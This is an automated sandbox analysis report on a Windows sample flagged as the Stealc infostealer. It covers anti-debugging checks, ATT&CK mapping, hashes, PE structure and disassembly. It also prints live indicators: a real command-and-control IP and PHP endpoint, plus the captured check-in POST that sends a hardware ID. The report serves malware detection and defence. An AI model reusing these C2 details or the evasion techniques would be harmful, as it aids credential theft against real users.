                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A745C0 VirtualProtect ?,00000004,00000100,000000000_2_00A745C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A89860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A89860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A89750 mov eax, dword ptr fs:[00000030h]0_2_00A89750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A878E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00A878E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A89600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00A89600
                Source: file.exe, file.exe, 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: BProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00A87B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A87980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00A87980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A87850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00A87850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A87A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00A87A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.a70000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1255957657.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.a70000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1255957657.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/tfile.exe, 00000000.00000002.1297365011.00000000006C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.php&f&ffile.exe, 00000000.00000002.1297365011.00000000006E4000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.37wfile.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpfeVfile.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.37/e2b1563c6670f193.phpVefile.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.37
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1521649
                                Start date and time:2024-09-29 01:35:08 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 56s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 18
                                • Number of non-executed functions: 87
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.37file.exeGet hashmaliciousAmadey, StealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, StealcBrowse
                                • 185.215.113.103
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.947459611439105
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'843'712 bytes
                                MD5:4d54b2279d2b7ca76fdaf6d89c509355
                                SHA1:379684bc91685997bfe8fba6a15212f925c7cafe
                                SHA256:65055a6af994e27432e1bb9ced6fcb0886680b9f5a1a715d32d98341203cb7cc
                                SHA512:8b15040ddc2c1e1070fa1e1f74d9c62610ff4f0e8c0fa2ffa995dc6696dfb6d851a7e60dece0eb2e753d62ab366b6cec18ca9f56333e4508d6b90c7f61066bd2
                                SSDEEP:49152:wVJht3RXBy6BIag4TbsjVgH9r8DEqqZfLK+F5SfJrjzfl:wVJhtFB7SkQmHl8a5LKMSFfl
                                TLSH:F68533FD3816FCA0CEC42C3169474E1BB999224743D7DB2DEEAEC50699DB38067D9842
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xa9b000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007F540865AECAh
                                ltr word ptr [eax+eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                jmp 00007F540865CEC5h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                and eax, dword ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add eax, 0300000Ah
                                or al, byte ptr [eax]
                                add byte ptr [edx+ecx], al
                                add byte ptr [eax], al
                                add cl, byte ptr [edx]
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x25b0000x228006dbc7089aebc1ca85afc2cb30e070ca0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x25e0000x2a00000x2001e38b4a34cb01603b77c39c09dc0a4dfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                spyqlfjc0x4fe0000x19c0000x19be0025b58f188a804099cd315ae113b7bdfbFalse0.9948946083080424data7.9536919163300555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                scxfhudm0x69a0000x10000x60060b0fd34005dd0d9308cd327d29b158eFalse0.587890625data5.051555941674177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x69b0000x30000x220018bbe7bd9d2032f19a4448beb393b948False0.062270220588235295Applesoft BASIC program data, first line number 150.8136820767074039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-09-29T01:36:06.027240+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749699185.215.113.3780TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 29, 2024 01:36:05.059812069 CEST4969980192.168.2.7185.215.113.37
                                Sep 29, 2024 01:36:05.064753056 CEST8049699185.215.113.37192.168.2.7
                                Sep 29, 2024 01:36:05.064846992 CEST4969980192.168.2.7185.215.113.37
                                Sep 29, 2024 01:36:05.065614939 CEST4969980192.168.2.7185.215.113.37
                                Sep 29, 2024 01:36:05.070385933 CEST8049699185.215.113.37192.168.2.7
                                Sep 29, 2024 01:36:05.782670975 CEST8049699185.215.113.37192.168.2.7
                                Sep 29, 2024 01:36:05.782742023 CEST4969980192.168.2.7185.215.113.37
                                Sep 29, 2024 01:36:05.787992954 CEST4969980192.168.2.7185.215.113.37
                                Sep 29, 2024 01:36:05.792798042 CEST8049699185.215.113.37192.168.2.7
                                Sep 29, 2024 01:36:06.027143955 CEST8049699185.215.113.37192.168.2.7
                                Sep 29, 2024 01:36:06.027240038 CEST4969980192.168.2.7185.215.113.37
                                Sep 29, 2024 01:36:08.926250935 CEST4969980192.168.2.7185.215.113.37

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 29, 2024 01:36:48.156236887 CEST5358184162.159.36.2192.168.2.7
                                Sep 29, 2024 01:36:48.885674000 CEST53598011.1.1.1192.168.2.7

                                HTTP Request Dependency Graph

                                • 185.215.113.37

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749699185.215.113.37806672C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Sep 29, 2024 01:36:05.065614939 CEST89OUTGET / HTTP/1.1
                                Host: 185.215.113.37
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Sep 29, 2024 01:36:05.782670975 CEST203INHTTP/1.1 200 OK
                                Date: Sat, 28 Sep 2024 23:36:05 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Sep 29, 2024 01:36:05.787992954 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDB
                                Host: 185.215.113.37
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 30 35 39 30 36 42 45 30 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 2d 2d 0d 0a
                                Data Ascii: ------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="hwid"8E05906BE0482604982160------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="build"save------JJJJDAAECGHDGDGCGHDB--
                                Sep 29, 2024 01:36:06.027143955 CEST210INHTTP/1.1 200 OK
                                Date: Sat, 28 Sep 2024 23:36:05 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:19:36:01
                                Start date:28/09/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xa70000
                                File size:1'843'712 bytes
                                MD5 hash:4D54B2279D2B7CA76FDAF6D89C509355
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1255957657.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:7.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:3.2%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:25
                                  execution_graph 13430 a869f0 13475 a72260 13430->13475 13454 a86a64 13455 a8a9b0 4 API calls 13454->13455 13456 a86a6b 13455->13456 13457 a8a9b0 4 API calls 13456->13457 13458 a86a72 13457->13458 13459 a8a9b0 4 API calls 13458->13459 13460 a86a79 13459->13460 13461 a8a9b0 4 API calls 13460->13461 13462 a86a80 13461->13462 13627 a8a8a0 13462->13627 13464 a86b0c 13631 a86920 GetSystemTime 13464->13631 13466 a86a89 13466->13464 13468 a86ac2 OpenEventA 13466->13468 13470 a86af5 CloseHandle Sleep 13468->13470 13473 a86ad9 13468->13473 13471 a86b0a 13470->13471 13471->13466 13474 a86ae1 CreateEventA 13473->13474 13474->13464 13828 a745c0 13475->13828 13477 a72274 13478 a745c0 2 API calls 13477->13478 13479 a7228d 13478->13479 13480 a745c0 2 API calls 13479->13480 13481 a722a6 13480->13481 13482 a745c0 2 API calls 13481->13482 13483 a722bf 13482->13483 13484 a745c0 2 API calls 13483->13484 13485 a722d8 13484->13485 13486 a745c0 2 API calls 13485->13486 13487 a722f1 13486->13487 13488 a745c0 2 API calls 13487->13488 13489 a7230a 13488->13489 13490 a745c0 2 API calls 13489->13490 13491 a72323 13490->13491 13492 a745c0 2 API calls 13491->13492 13493 a7233c 13492->13493 13494 a745c0 2 API calls 13493->13494 13495 a72355 13494->13495 13496 a745c0 2 API calls 13495->13496 13497 a7236e 13496->13497 13498 a745c0 2 API calls 13497->13498 13499 a72387 13498->13499 13500 a745c0 2 API calls 13499->13500 13501 a723a0 13500->13501 13502 a745c0 2 API calls 13501->13502 13503 a723b9 13502->13503 13504 a745c0 2 API calls 13503->13504 13505 a723d2 13504->13505 13506 a745c0 2 API calls 13505->13506 13507 a723eb 13506->13507 13508 a745c0 2 API calls 13507->13508 13509 a72404 13508->13509 13510 a745c0 2 API calls 13509->13510 13511 a7241d 13510->13511 13512 a745c0 2 API calls 13511->13512 13513 a72436 13512->13513 13514 a745c0 2 API calls 13513->13514 13515 a7244f 13514->13515 13516 a745c0 2 API calls 13515->13516 13517 a72468 13516->13517 13518 a745c0 2 API calls 13517->13518 13519 a72481 13518->13519 13520 a745c0 2 API calls 13519->13520 13521 a7249a 13520->13521 13522 a745c0 2 API calls 13521->13522 13523 a724b3 13522->13523 13524 a745c0 2 API calls 13523->13524 13525 a724cc 13524->13525 13526 a745c0 2 API calls 13525->13526 13527 a724e5 13526->13527 13528 a745c0 2 API calls 13527->13528 13529 a724fe 13528->13529 13530 a745c0 2 API calls 13529->13530 13531 a72517 13530->13531 13532 a745c0 2 API calls 13531->13532 13533 a72530 13532->13533 13534 a745c0 2 API calls 13533->13534 13535 a72549 13534->13535 13536 a745c0 2 API calls 13535->13536 13537 a72562 